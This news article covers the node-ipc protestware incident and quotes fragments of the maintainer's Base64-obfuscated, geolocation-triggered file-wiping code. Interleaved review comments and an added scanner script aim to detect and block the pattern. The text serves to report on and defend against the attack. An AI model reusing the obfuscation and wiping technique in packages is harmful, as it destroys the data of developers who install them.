Sabotage: Code added to popular NPM package wiped files in Russia and Belarus

The developer of a popular open source package has been caught adding malicious code to it, leading to wiped files on computers located in Russia and Belarus. The move was part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

The package, node-ipc, adds remote interprocess communication and neural networking capabilities to other open source code libraries. One of those libraries, Vue.js CLI, has more than 1 million weekly downloads.

A deliberate and dangerous act

Two weeks ago, the author of the library pushed a new version that sabotaged computers in Russia and other countries, as well as providing support for the invasion of Ukraine. The new release added a function to check the address of developers who used node-ipc in their own projects; if the address matched Russia or Belarus, the new version wiped files from the machine and replaced their contents with a heart symbol.

The author, Brandon Nozaki Miller, Base64-encoded the strings in the changes to make it harder for users to spot the problem by visually inspecting the code.

This is what developers saw in the diff:

+      const n2 = Buffer.from("Li8=", "base64");
+      const o2 = Buffer.from("Li4v", "base64");
+      const r = Buffer.from("Li4vLi4v", "base64");
+      const f = Buffer.from("Lw==", "base64");
+      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
+      const e = Buffer.from("cnVzc2lh", "base64");
+      const i = Buffer.from("YmVsYXJ1cw==", "base64");
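Review bot: all seven constants are Base64-encoded string literals with no legitimate reason to be encoded; `Buffer.from("Li8=", "base64")` is simply "./" and `Buffer.from("Lw==", "base64")` is "/", while the last three decode to a geolocation field name and the two country names the article discusses. Decode every such literal during review rather than trusting the variable names, and treat encoded path and country strings arriving in a dependency update as a blocker until the author explains them in plain text.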

The decoded strings were then passed to the timer function:

+          h(n2.toString("utf8"));

The Base64 strings decode to the following values:

  • n2 is set to: ./
  • o2 is set to: ../
  • r is set to: ../../
  • f is set to: /

When passed to the timer function, these decoded paths were the starting points from which files were wiped and their contents replaced with the heart symbol.
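A defensive check for the obfuscation pattern described above, added here as an example in Node.js (not code from the article or from node-ipc): it decodes every `Buffer.from("…", "base64")` literal found in a source file and flags those that decode to a filesystem root or a directory-traversal path, using the seven quoted lines as constructed sample input.

```javascript
// Added example, not code from the article or from node-ipc: a small scanner
// for the obfuscation pattern quoted above. It finds every
// Buffer.from("<base64>", "base64") literal in JavaScript source, decodes it,
// and flags any that decode to a filesystem root or a traversal path.

// Matches Buffer.from("...", "base64") with single or double quotes.
const BASE64_LITERAL =
  /Buffer\.from\(\s*(["'])([A-Za-z0-9+\/]+=*)\1\s*,\s*(["'])base64\3\s*\)/g;

// "/", "./", "../", "../../", ... : the decoded values seen in the incident.
const ROOT_OR_TRAVERSAL = /^(?:\/|(?:\.\.?\/)+)$/;

// Decode every Base64 literal in `source`; returns one record per literal.
function decodeBase64Literals(source) {
  const records = [];
  for (const m of source.matchAll(BASE64_LITERAL)) {
    const decoded = Buffer.from(m[2], "base64").toString("utf8");
    records.push({
      encoded: m[2],
      decoded,
      // true when the plaintext is a path a wiper could iterate from
      pathLike: ROOT_OR_TRAVERSAL.test(decoded),
    });
  }
  return records;
}

// Only the records a reviewer should block on.
function suspiciousLiterals(source) {
  return decodeBase64Literals(source).filter((r) => r.pathLike);
}

// Constructed sample input: the seven lines quoted in the article, as they
// would appear in the package's bundled source.
const SAMPLE_SOURCE = `
      const n2 = Buffer.from("Li8=", "base64");
      const o2 = Buffer.from("Li4v", "base64");
      const r = Buffer.from("Li4vLi4v", "base64");
      const f = Buffer.from("Lw==", "base64");
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
      const e = Buffer.from("cnVzc2lh", "base64");
      const i = Buffer.from("YmVsYXJ1cw==", "base64");
`;

// Stand-alone run: print every decoded literal and mark the path-like ones.
for (const r of decodeBase64Literals(SAMPLE_SOURCE)) {
  const flag = r.pathLike ? "SUSPICIOUS" : "decoded   ";
  console.log(`${flag} ${r.encoded.padEnd(18)} -> ${JSON.stringify(r.decoded)}`);
}
```

Run it over a dependency's `dist` or `node_modules` files before accepting an upgrade; any flagged record is worth a manual look regardless of what the surrounding variable names suggest.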

+      try {
+        import_fs3.default.writeFile(i, c.toString("utf8"), function() {
+        });
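Review bot: the `writeFile` callback is an empty function, so any error from the write is silently discarded, and the call sits inside a `try` whose only purpose is to keep running regardless of failure. Combined with a destination path and file content that both come from decoded Base64 variables rather than from anything an interprocess-communication library is documented to write, this hunk should not pass review: ask for the plain-text path and content, and for a justification of why the module writes to the filesystem at all.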

"A critical supply chain security incident will occur for any system on which this npm package will be called upon, if that matches the location of either Russia or Belarus," wrote Liran Tal.

Tal found that the author of node-ipc maintains 40 other libraries, some of which are also dependencies of other open source packages. Tal questioned the wisdom of the protest and its likely ramifications for the open source community as a whole:

"Even if the deliberate and dangerous act of maintainer RIAEvangelist will be perceived by some as a legitimate act of protest, how does that reflect on the maintainer's future reputation and stake in the developer community?"

Gone forever

In open source forums, RIAEvangelist came under fire. One poster wrote: "The new malicious code release resulted in executing your code and wiping over 30,000 messages and files detailing war crimes committed in Ukraine by the Russian army and government."

The person who took down the post and re-posted it here said that the purpose of the Belarussian server was to circumvent censorship in that country. The organization's personnel had already been stretched thin since Russia began its invasion of Ukraine, and for reasons that aren't clear, messages from front-line soldiers and other sensitive data were likely gone forever.

The person wrote that the "shenanigan" did more damage to them than Putin or Lukashenka. "Our counsel suggested that we file criminal charges in federal court," the person added.